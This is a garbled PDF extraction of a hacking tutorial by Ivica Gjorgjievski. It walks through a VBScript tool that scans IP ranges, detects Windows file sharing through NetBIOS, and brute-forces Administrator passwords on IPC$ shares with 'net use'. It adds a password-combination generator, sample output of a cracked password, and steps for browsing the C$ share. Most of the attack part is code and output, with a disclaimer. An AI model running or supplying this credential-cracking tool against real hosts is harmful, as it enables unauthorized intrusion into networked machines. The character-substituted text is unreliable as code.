Hacker2 Introduction

Ivica Gjorgjievski - IGProgram

info@igprogram.tk
http://www.igprogram.tk
his tutoria! is free for use and distri"ution as it is# cannot "e
changed or used for commercia! purposes.
$ontent
Introduction.........................................................................................................................................%
% &canning............................................................................................................................................%
2 $racking............................................................................................................................................'
( Hacking..............................................................................................................................................)
Introduction
his tutoria! is introduction to Hacking.
he tutoria! contains "asic techni*ues of hacking# can "e usefu! for computer users and information
securit+ professiona!s to understand how it works and to "e aware of it.
Hacker is individua! who "reaks into information s+stems.
,sua!!+ are two categories of hackers# ethica! -white. hackers who are authori/ed to test
information s+stems# and ma!icious -"!ack. hackers who "reak information s+stem for ma!icious
purposes.
Hacking is activit+ of "reaking into information s+stems with scanning enumeration cracking and
simi!ar techni*ues.
Previous tutoria! show "asic techni*ues of hacking with separated "atch scripts.
his tutoria! automates the processes of scanning and cracking in one script with 01&cript
programming !anguage.

2inks:
01&3dit: http://www.v"sedit.com
IP ranges 3,: http://www.ripe.net
4ttention5
,nauthori/ed hacking is against !aws and it is prosecuted "+ the authorities.
4uthori/ed hacking has to "e e6p!icit!+ re*uested and confirmed with documents.
4uthor is not responsi"!e for inappropriate or ma!icious use of this tutoria!.
% &canning
&canning is the activit+ of searching for computers services or ports on the network.
he first steps of hackers are activities of scanning# the+ scan the network in research of computers#
when the hosts are identified ne6t steps are scanning for ports and services.
%
Ping is the command !ine uti!it+ for network testing# it send re*uest to host on the network and if the
host is avai!a"!e rep!a+ is received.
ping %72.%)8.%.%2
9esu!t:
Pinging %72.%)8.%.%2 with (2 "+tes of data:
9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28
9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28
9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28
9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28
Ping statistics for %72.%)8.%.%2:
Packets: &ent : '# 9eceived : '# 2ost : < -<= !oss.#
4ppro6imate round trip times in mi!!i-seconds:
>inimum : <ms# >a6imum : <ms# 4verage : <ms
01&cript script can "e used to scan range of IP addresses.
he fo!!owing e6amp!es scan range of IP addresses and if hosts are discovered the IP is passed to
the ne6t procedure.
?&can IP9ange and for each ip ca!! IP&can procedure
&u" IP9ange&can-iprange.
@im ip# iparra+# ipstart# ipend# resu!t
?&p!it IP9ange
iparra+ : &p!it-iprange# A-A.
ipstart : &p!it-rim-iparra+-<..#A.A.
ipend : rim-iparra+-%..
?&can first ip
ip : Boin-ipstart# A.A.
IP&can ip
?2oop IP9ange
resu!t : -%
Chi!e resu!t ; <
ipstart-(. : ipstart-(. D %
Eor i : ,1ound-ipstart. o % &tep - %
If ipstart-i. F 2G) hen
ipstart-i. : <
ipstart-i-%. : ipstart-i-%. D %
3nd If
He6t
ip : Boin-ipstart# A.A.
IP&can ip ?$a!! IP&can procedure for furter processing
resu!t : &tr$omp-IPEi!!-ip.# IPEi!!-ipend.. ?$heck if done
Cend
3nd &u"
2
?Ping ip address# if there is rep!+ ca!! Het1ios&can procedure
&u" IP&can-ip.
@im e6ec# response# resu!t
?3cho current status
ip$urrent : ip
ip$ount : ip$ount D %
3cho2
?Ping ip and check resu!t
&et e6ec : she!!.36ec-Aping -n % -! % -w %<< A I ip.
response : 2$ase-e6ec.&tdJut.9ead4!!.
resu!t : -In&tr-response# Att!A. F <. ?tt! : ping rep!+
If resu!t hen
scans$ount : scans$ount D %
outputEi!e.Crite2ine ip I v"a" I APing 9ep!+A
Het1ios&can ip ?$a!! Het1ios&can procedure
3nd If
3nd &u"
Cindows operating s+stem has Ei!e and Printer &haring service# this service is accessed "+ Het1ios
and $P protoco!s# and ports %(7 or ''G.
H"tstat is command !ine too! for diagnostic of Het1ios service. If the resu!t of this too! contains
;2<F then tested host has avai!a"!e Ei!e and Printer &haring service.
n"tstat -4 %72.%)8.%.%2
9esu!t:
Het1IJ& 9emote >achine Hame a"!e
Hame +pe &tatus
---------------------------------------------
CIH@JC&KP ;<<F ,HIL,3 9egistered
CJ9MG9J,P ;<<F G9J,P 9egistered
CIH@JC&KP ;2<F ,HIL,3 9egistered
CJ9MG9J,P ;%3F G9J,P 9egistered
CJ9MG9J,P ;%@F ,HIL,3 9egistered
..NN>&19JC&3NN.;<%F G9J,P 9egistered
Eo!!owing script scan IP and check if host has Ei!e and Printer &ervice avai!a"!e# if found ca!! the
successive procedure with that IP.
?&can ip for Ei!e &haring through Het1ios and ca!! $rack procedure
&u" Het1ios&can-ip.
@im e6ec# response# resu!t
&et e6ec : she!!.36ec-An"tstat -4 A I ip.
(
response : 2$ase-e6ec.&tdJut.9ead4!!.
resu!t : -In&tr-response# A;2<FA. F <. ?;2<F Ei!e sharing
If resu!t hen
cracks$ount : cracks$ount D %
outputEi!e.Crite2ine ip I v"a" I AEi!e &haringA
$rack ip ?$a!! $rack procedure
3nd If
3nd &u"
2 $racking
Password cracking is the process of repeated!+ guessing for the password.
Cindows operating s+stem has defau!t shares as IP$O# $O and 4dminO that are avai!a"!e with Ei!e
and Printer &haring service over Het1ios.
4ccess to operating s+stem resources are checked "+ the operating s+stem# correct credentia!s as
user and password are needed for successfu! access.
Het use command is used to manage shared resources# usua!!+ to connect to network resources.
he fo!!owing command tr+ to access the IP$O share on remote host.
net use PP%72.%)8.%.%2PipcO /u:A4dministratorA ApasswordA
9esu!t:
&+stem error %(2) has occurred.
2ogon fai!ure: unknown user name or "ad password.
--
$orrect user and password are needed to successfu!!+ access the host resources.
Eo!!owing e6amp!e use !ist of users and passwords from fi!es ,sers.t6t and Passwords.t6t for
password cracking# if correct password is found the command is written in fi!e HackJutput.t6t
Ei!e: ,sers.t6t
4dministrator
Ei!e: Passwords.t6t
password%
password2
password(
password'
passwordG
password)
&u" $rack-ip.
@im usersEi!e# passwordsEi!e# e6ec# response# resu!t# command
?Jpen users fi!e and !oop for each user
&et usersEi!e : fso.Jpene6tEi!e-A.P,sers.t6tA# Eor9eading.
@o ,nti! usersEi!e.4t3ndJf&tream
'
user$urrent : usersEi!e.9ead2ine

?Jpen passwords fi!e and !oop for each password
&et passwordsEi!e : fso.Jpene6tEi!e-A.PPasswords.t6tA# Eor9eading.
@o ,nti! passwordsEi!e.4t3ndJf&tream
password$urrent : passwordsEi!e.9ead!ine
?r+ to crack and check resu!t
command : Anet use PPA I ip I APIP$O /u:AAA I user$urrent I AAA AAA I
password$urrent I AAAA
&et e6ec : she!!.36ec-command.
response : e6ec.&td3rr.9ead4!!-.
resu!t : -2en-response. : <.
3cho2
If resu!t hen
? Crite resu!t to fi!e
outputEi!e.Crite2ine command
hacks$ount : hacks$ount D %
36it @o
3nd If
2oop
PasswordsEi!e.$!ose
2oop
usersEi!e.$!ose
user$urrent : AA
password$urrent : AA
3nd &u"
$ommand 36amp!e:
$&cript Hacks.v"s %72.%)8.%.<-%72.%)8.%.%<<
9esu!t:
net use PP%72.%)8.%.%2PipcO /u:A4dministratorA ApasswordGA
he password is cracked# access to host %72.%)8.%.%2 is successfu! with user: 4dministrator and
password: passwordG
Eor "rute force attack the hackers use set of common passwords# or passwords generated from set of
s+m"o!s with appropriate a!gorithm.
Eo!!owing script is part of script Pass.v"s# it is e6amp!e of a!gorithm for password generation from
set of s+m"o!s.
?Generate passwords com"inations and write output to disp!a+# or a!so in fi!e
?--- Parameters configuration ---
?Password &+m"o!s
&+m"o!s : Aa"cdefghijk!mnop*rstuvw6+/A
?&+m"o!s : Aa"cdefghijk!mnop*rstuvw6+/<%2('G)Q87A
?&+m"o!s : A41$@3EGHIBM2>HJPL9&,0CKRS<%2('G)Q87A
2ength : ( ?Password 2ength
G
CriteoEi!e : Ea!se ?Passwords a!so written to fi!e# true or fa!se
@e!a+ : < ?% >i!!isecond @e!a+ to "e visi"!e on @isp!a+# < fast
?--------------------------------------------------
?Generate passwords com"inations and write output to disp!a+# or a!so in fi!e
&u" Passwords-.
count : <
start : How-.
password : AA
?Generate password com"inations
Eor i : < o count>a6 ?Eor each com"ination
inde6es-<. : inde6es-<. D % ?Incremet first e!ement
Eor inde6 : < o ,1ound-inde6es. ?Eor each e!ements in &+m"o!s
If inde6es-inde6. : 2en-&+m"o!s. hen ?If e!ement com"inations done
inde6es-inde6. : < ?9eset inde6 to <
If inde6 ; ,1ound-inde6es. hen ?If not !ast e!ement
?Increment the ne6t e!ement
inde6es-inde6D%. : inde6es-inde6D%. D %
3nd If
3nd If
He6t
?Print resu!t
password : &tr9everse-GetPass-..
count : count D %
?&!eep T mi!!iseconds# to "e visi"!e on disp!a+
C&cript.&!eep @e!a+
?Print output to disp!a+
C&cript.&tdJut.Crite A$ounter: A I count I A/A I N
count>a6 D % I A U ime: A I N
$@ate-How-. - start. I A U A I N
password I $hr-%(.
?Print output to fi!e
If CriteoEi!e hen
outputEi!e.Crite2ine password
3nd If
He6t
3nd &u"
9esu!t:
$ounter: %82Q8/%82Q8 U ime: <<:<<:<2 U ///
( Hacking
Hacking of compromised host can consist of different activities# as access to important information#
e6tracting passwords or insta!!ing sp+ware programs.
Het view command shows the shared resources on remote host:
net view PP%72.%)8.%.%2
)
he same resu!ts can "e o"tained in Cindows 36p!orer# just insert PP%72.%)8.%.%2 in address "ar.
o access shares fi!es and fo!ders# insert PP%72.%)8.%.%2P$O in Cindows 36p!orer address "ar.
Hote:
Hacking techni*ues in this tutoria! are ver+ simp!e and primitive just for demonstration.
here are !ot of much powerfu! techni*ues and too!s even for free on internet# and who know what
e!se e6ists.
&o the recommendation is shie!ds a!wa+s up 5
Ivica Gjorgjievski - IGProgram
info@igprogram.tk
http://www.igprogram.tk
his tutoria! is free for use and distri"ution as it is# cannot "e
changed or used for commercia! purposes.
Q